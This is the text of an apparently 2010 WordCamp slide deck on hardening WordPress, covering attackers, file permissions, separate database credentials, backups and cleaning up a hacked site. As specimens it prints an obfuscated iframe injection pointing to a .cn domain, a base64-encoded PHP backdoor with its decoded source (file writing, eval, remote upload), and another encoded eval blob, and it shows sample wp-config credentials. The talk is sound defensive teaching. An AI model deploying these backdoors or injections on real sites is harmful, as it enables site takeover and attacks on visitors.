Hardening your WordPress Installation http://johnford.is/ @iamjohnford
Who, why, what, and how to fix it
Who does this crap?
http://flic.kr/p/8gKpiG
http://flic.kr/p/8rW6hU
http://flic.kr/p/5AU3Lp
Smoking Asthmatic Clown SAC
http://flic.kr/p/5AU3Lp
Why do SACs exist?
What do SACs do?
document.write(unescape('%3C%69%66%72%61%6D %65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%62%6C %34%63%6B%73%74%34%72%2E%63%6E%2F%62%6C%6F%67%2F %67%6F%2E%70%68%70%3F%73%69%64%3D %31%37%27%20%77%69%64%74%68%3D %27%30%27%20%68%65%69%67%68%74%3D%27%30%27%3E%3C%2F %69%66%72%61%6D%65%3E'));
<iframe src='http://bl4ckst4r.cn/blog/go.php? sid=17' width='0' height='0'></iframe>
<?php eval(base64_decode ("Pz48P3BocA0KJGRlbGltID0gIiAgICAgIjsgZWNobyAkZGVsaW07IGVycm9yX3JlcG9ydGluZyhFX0FM TCk7IGlmKCFlbXB0eSgkX1BPU1RbJ2RhdGEnXSkpIHsgJHBvc3RbJ2RhdGEnXSA9ICRfUE9TVFsnZGF0YS ddOyBpZighZW1wdHkoJF9QT1NUWyd1cmwnXSkpIHsgJHRtcCA9IGJhc2U2NF9kZWNvZGUoJF9QT1NUWyd1 cmwnXSk7ICR1cmxzX2FycmF5ID0gdW5zZXJpYWxpemUoJHRtcCk7ICR1cmwgPSBhcnJheV9zaGlmdCgkdX Jsc19hcnJheSk7IGlmKCFlbXB0eSgkdXJsc19hcnJheSkgQU5EIGNvdW50KCR1cmxzX2FycmF5KT4wKSB7 ICR0bXAgPSBzZXJpYWxpemUoJHVybHNfYXJyYXkpOyAkcG9zdFsndXJsJ10gPSBiYXNlNjRfZW5jb2RlKC R0bXApOyB9ICR0bXAgPSBwYXJzZV91cmwoJHVybCk7IGlmKCR0bXBbJ3NjaGVtZSddPT0iZnRwIikgeyBl Y2hvICJ0cnlpbmcgdG8gdXBkYXRlIGZpbGVbICIuJHRtcFsncGF0aCddLiIgXSB2aWEgRlRQXG4iOyAkZm lsZSA9ICd0bXAucGhwJzsgJGNvbnRlbnQgPSB1bnNlcmlhbGl6ZShiYXNlNjRfZGVjb2RlKCRwb3N0Wydk YXRhJ10pKTsgJGNvbnRlbnQgPSBiYXNlNjRfZGVjb2RlKCRjb250ZW50Wydjb250ZW50J10pOyAkZnAgPS Bmb3BlbigkZmlsZSwgJ3cnKTsgZndyaXRlKCRmcCwgJGNvbnRlbnQpOyBmY2xvc2UoJGZwKTsgY2htb2Qo JGZpbGUsIDA3NzcpOyAkZnAgPSBmb3BlbigkZmlsZSwncicpOyAkcG9zdCA9IGZhbHNlOyB9IGVsc2Ugey BlY2hvICJTZW5kaW5nIHJlcXVlc3QgdG86ICR1cmwgXG4iOyAkZnAgPSBmYWxzZTsgfSAkY29udGVudCA9 IHJlcXVlc3QoJHVybCwgJHBvc3QsICRmcCk7IGlmKCR0bXBbJ3NjaGVtZSddPT0iZnRwIikgeyBmY2xvc2 UoJGZwKTsgdW5saW5rKCRmaWxlKTsgfSBpZigkdG1wWydzY2hlbWUnXT09ImZ0cCIgQU5EICRjb250ZW50 IT09ZmFsc2UpIGVjaG8gIkZUUDogVVBEQVRFRFxuIjsgZWxzZSBlY2hvICRkZWxpbS4kY29udGVudDsgfS BlbHNlIHsgJHRtcCA9IGJhc2U2NF9kZWNvZGUoJHBvc3RbJ2RhdGEnXSk7ICRkYXRhID0gdW5zZXJpYWxp emUoJHRtcCk7IGlmKGVtcHR5KCRkYXRhKSBPUiAhaXNfYXJyYXkoJGRhdGEpKSB7IGV4aXQoIlNvbWUgZX Jyb3Igd2hpbGUgc2F2aW5nOyIpOyB9IGZvcmVhY2ggKCRkYXRhIEFTICRkKSB7IGlmKGRpcm5hbWUoJGRb J24nXSkhPScuJyBhbmQgIWZpbGVfZXhpc3RzKGRpcm5hbWUoJGRbJ24nXSkpKSB7IG1rZGlyKGRpcm5hbW UoJGRbJ24nXSksIDA3NzcpOyBjaG1vZChkaXJuYW1lKCRkWyduJ10pLCAwNzc3KTsgfSBpZigkZFsnbidd PT0nZXYnKSB7IGV2YWwoJGRbJ2MnXSk7IGNvbnRpbnVlOyB9ICRmID0gZm9wZW4oJGRbJ24nXSwgJ3cnKT sgJGJ5dGVzX3dyaXR0ZW4gPSBmd3JpdGUoJGYsICRkWydjJ10pOyBmY2xvc2UoJGYpOyBpZihmaWxlc2l6 ZSgkZFsnbiddKT4xMCkgeyBlY2hvICJmaWxlOiIuJGRbJ24nXS4iOiBzYXZlZFxuIjsgfSBlbHNlIHsgZW NobyAic29tZSBlcnJvciBoYXBwZW5zOiAiLiRkWyduJ10uIiBzaXplIGlzOiAiLmZpbGVzaXplKCRkWydu J10pLiIgYnl0ZXNcbiI7IH0gaWYoIUBjaG1vZCgkZFsnbiddLCAwNzc3KSkgeyBlY2hvICJzb21lIGVycm 9yIHdpdGg6ICIuJGRbJ24nXS4iXG4iOyB9IH0gfSB9IGVsc2UgeyBkaWUoIk5PIERBVEEiKTsgfSBmdW5j
<?php $delim = " "; echo $delim; error_reporting(E_ALL); if(!empty($_POST['data'])) { $post['data'] = $_POST['data']; if(!empty($_POST['url'])) { $tmp = base64_decode ($_POST['url']); $urls_array = unserialize($tmp); $url = array_shift($urls_array); if(!empty($urls_array) AND count($urls_array)>0) { $tmp = serialize($urls_array); $post['url'] = base64_encode($tmp); } $tmp = parse_url($url); if($tmp['scheme'] =="ftp") { echo "trying to update file[ ".$tmp['path']." ] via FTP\n"; $file = 'tmp.php'; $content = unserialize(base64_decode($post['data'])); $content = base64_decode($content['content']); $fp = fopen($file, 'w'); fwrite($fp, $content); fclose($fp); chmod($file, 0777); $fp = fopen($file,'r'); $post = false; } else { echo "Sending request to: $url \n"; $fp = false; } $content = request($url, $post, $fp); if($tmp['scheme']=="ftp") { fclose($fp); unlink ($file); } if($tmp['scheme']=="ftp" AND $content!==false) echo "FTP: UPDATED\n"; else echo $delim.$content; } else { $tmp = base64_decode($post['data']); $data = unserialize($tmp); if(empty($data) OR !is_array($data)) { exit("Some error while saving;"); } foreach ($data AS $d) { if(dirname($d['n'])!='.' and !file_exists (dirname($d['n']))) { mkdir(dirname($d['n']), 0777); chmod(dirname($d['n']), 0777); } if($d['n']=='ev') { eval($d['c']); continue; } $f = fopen($d['n'], 'w'); $bytes_written = fwrite($f, $d['c']); fclose($f); if(filesize($d['n'])>10) { echo "file:".$d['n'].": saved\n"; } else { echo "some error happens: ".$d['n']." size is: ".filesize($d['n'])." bytes\n"; } if(!@chmod($d['n'], 0777)) { echo "some error with: ".$d['n']."\n"; } } } } else { die("NO DATA"); } function request ($url, $post=false, $fp=false, $timeout=150){ $ch = curl_init(); if($post) { $post = is_array($post)?http_build_query($post):$post; curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } if($fp) { curl_setopt($ch, CURLOPT_UPLOAD, 1); curl_setopt($ch, CURLOPT_INFILE, $fp); fclose($fp); } curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $content = curl_exec($ch); $error = curl_error($ch); if($error) { echo "CURL_ERROR: ".$error."\n"; return false; }
Why are these attacks bad?
How does your site get SACed & how do you stop SACholes?
Guess your password
IsJFs@WCNYC2k10 I saw John Ford speak at WordCamp NYC 2010
Exploit old versions of WordPress
Exploit vulnerable themes and plugins
eval(gzuncompress(base64_decode('eJzcvdtyHMmSIPYOs/6H7Jo +XcCZQt2vBEEuCALdnOZNAMiesyQHlpUZVZVEVmadzCyA4PQxW0kmjcxkMj2tnvaxz2pMkmnHZKa10 YN2fqX/ QL8gv0RERmRmASC7e6Ztjp0mKuPi4eHh4eER4eEezLZnQSjOxYcgzdJtP0gidym2z8+Pnzw9Oj/ fcZpOvSX8IJuusyyOmqvFqr6z4/ytE0ReuPaFs10v5u45f3ICALuOvCyIIwW6Pv/oxctVItK0vuN8/ bVTUQBSdBFoZMv56vVM+O1u39l3smQtEPRXrycT0XN7kPT81dOne5AwHHvDiQcJbfzqjYbD9sTIbo/ GYuYaCZ7w3WFHJWxBlU5XjLpGiU67782GkFA7iObpeulG9dQ5S9woDd0sTpyX4XoeRM7LJK5hcb8zG baxBTdJ3Ovt2nGQpFmt4dROhRdHPv46WwQJ/TiO10m2oF/ BDH7s7G0pSjjHXXcya7e3kcBfvZ6KniA061+diMt7zqjfd76qY3vTXnswQ6Kk62maJduqbMMZ7ux94 SQiWyeR0x12nb +Egcou3XA7L0l1G0674UBCKCKdtuPsOt0dwAeJ7A4Go8kYmhi2mar9cbuDVO0N6HviTgYdzK93221C atYe93tTSOl0nd87PVmvP5sNuwJTzcR2u91D8uqSMAiz4Xg6ohaGA4LndrwZjmr9/ iyOMicNPor9Wr/mzFwPfhwkgRs2nG9FeCmywHOhOzA8u6lIglntwf1p0npwthDOyp0L5zpeA1H +uBZpJnzHi9ehH72tZ85UAFvxoEK6mznZIkidLFiKJgyxcFPMv3bcuQuDjYWSpnMaJ5A0AybIADxMg zi6FFEgIi+vlAjXZ1huAriFAih733UWiZjt1xZZtrrXak3DeN7M3ASAR24T +L4VRL74gHOo5SbeIrgUrTWkACe5kR9E891M89+uSBL4F/vWwr4+MFjzCLPS+63pg/ st90GDMPVF5gYhYBP5jviwCqFF5LcmUYn+2XIeB8I5FUEmGo4PP/21cykSKDnPgGoN5+L/+6f/ N4oy4USBt8iwSLp0QwdSp4CiyD5mzpVIfBE1nUdBBuVeQ/ LaWzhXgYBOOOkKihIBAdd1EsydGSQk1NaryI0isViGAPoCULDweuo6WBWmm +vACDppDMWCzE0Rl9gBaq9iP4ESLo6lv/aCxBGRg0MNIymWqxiGBWgwcy/
File permissions http://codex.wordpress.org/Changing_File_Permissions
// ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'wcnyc2010'); /** MySQL database username */ define('DB_USER', 'wcnyc2010'); /** MySQL database password */ define('DB_PASSWORD', '3^?wb6mhqsiyk^ABHR6y'); /** MySQL hostname */ define('DB_HOST', 'mysql.myserver.com'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', '');
/**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '2FO}Z*-a#4E9Ft5$kBzZ_kk|Z3@zR+fRV`{$axu|r}(dE-Akbziu #-BLmd%qV-y'); define('SECURE_AUTH_KEY', '*E~-xU9xLhB[iv|8fUi7[{?=KS;E 0Cq#!NP, &]/oQwc1EkkR4A(c:x76f/w]Q)'); define('LOGGED_IN_KEY', '&psh-W)gE_~qK$kL{qT~2(XPyT<FAc}!=&{(SL!.?y9ObiYgNmdqohdH<t5/KO4='); define('NONCE_KEY', 'x&Im0c}brod3Cl%;jWJub<liaf:rFV#67F-E*o&$r90I/LSLP8Nz`Gb!R*H:J;4}'); define('AUTH_SALT', 'eO7i!tPIz[@dq.[mY`5zPu4x_b`K^6NTPK:%JwZdGCoo||)O}6aZ7>Y jb84mlxi'); define('SECURE_AUTH_SALT', '/a60,@Uf]/S$xHHQ]Dq/xB:zx^#%0<w#vPv|9go@y#c|*PW# bKE]|S&#-JJ}F65'); define('LOGGED_IN_SALT', 'IEP|]D`QVwDSg*t|[V>Jy]I^H~Q rfou+^wkV?FDbBO%fpg-(WH~v]7!_3M|&m(-'); define('NONCE_SALT', 'hnrbdh|-~=%>qC7Cbl33$=J~!F}SS*(*Fkl,uh8=7+u(b45|WtKe%S32r]3X~k/W');
http://wiki.mediatemple.net/w/File_Permissions
http://wiki.mediatemple.net/w/File_Permissions
Obscurity
Cross tool exploits
Multiple sites on the same server
A non-WordPress exploit
Use a different database user/pass for each site
Hardening WordPress http://codex.wordpress.org/Hardening_WordPress
What do you do if your site has been SACed?
Back up your exploited site
FAQ My site was hacked http://codex.wordpress.org/FAQ_My_site_was_hacked
Change all passwords and keys
// ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'wcnyc2010'); /** MySQL database username */ define('DB_USER', 'wcnyc2010'); /** MySQL database password */ define('DB_PASSWORD', '3^?wb6mhqsiyk^ABHR6y'); /** MySQL hostname */ define('DB_HOST', 'mysql.myserver.com'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', '');
/**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '2FO}Z*-a#4E9Ft5$kBzZ_kk|Z3@zR+fRV`{$axu|r}(dE-Akbziu #-BLmd%qV-y'); define('SECURE_AUTH_KEY', '*E~-xU9xLhB[iv|8fUi7[{?=KS;E 0Cq#!NP, &]/oQwc1EkkR4A(c:x76f/w]Q)'); define('LOGGED_IN_KEY', '&psh-W)gE_~qK$kL{qT~2(XPyT<FAc}!=&{(SL!.?y9ObiYgNmdqohdH<t5/KO4='); define('NONCE_KEY', 'x&Im0c}brod3Cl%;jWJub<liaf:rFV#67F-E*o&$r90I/LSLP8Nz`Gb!R*H:J;4}'); define('AUTH_SALT', 'eO7i!tPIz[@dq.[mY`5zPu4x_b`K^6NTPK:%JwZdGCoo||)O}6aZ7>Y jb84mlxi'); define('SECURE_AUTH_SALT', '/a60,@Uf]/S$xHHQ]Dq/xB:zx^#%0<w#vPv|9go@y#c|*PW# bKE]|S&#-JJ}F65'); define('LOGGED_IN_SALT', 'IEP|]D`QVwDSg*t|[V>Jy]I^H~Q rfou+^wkV?FDbBO%fpg-(WH~v]7!_3M|&m(-'); define('NONCE_SALT', 'hnrbdh|-~=%>qC7Cbl33$=J~!F}SS*(*Fkl,uh8=7+u(b45|WtKe%S32r]3X~k/W');
Remove rogue code
http://wordpress.org/extend/plugins/exploit-scanner/
Subversion http://codex.wordpress.org/Installing/ Updating_WordPress_with_Subversion
machine:www user$ svn status ? wp-config.php ? .htaccess M index.php ? wp-content/cache X wp-content/plugins/akismet M wp-content/themes/twentyten/404.php ? wp-admin/meta Performing status on external item at 'wp-content/plugins/akismet'
machine:www user$ svn diff wp-content/themes/twentyten/404.php Index: wp-content/themes/twentyten/404.php =================================================================== --- wp-content/themes/twentyten/404.php (revision 15819) +++ wp-content/themes/twentyten/404.php (working copy) @@ -1,3 +1,5 @@ +<?php echo "<h1>Here's some code that really shouldn't be here</h1>"; ?> + <?php /** * The template for displaying 404 pages (Not Found).
Check file permissions
Restore from backup
You are backing up, right?
http://flic.kr/p/5AU3Lp
?
Thank you! http://johnford.is/ @iamjohnford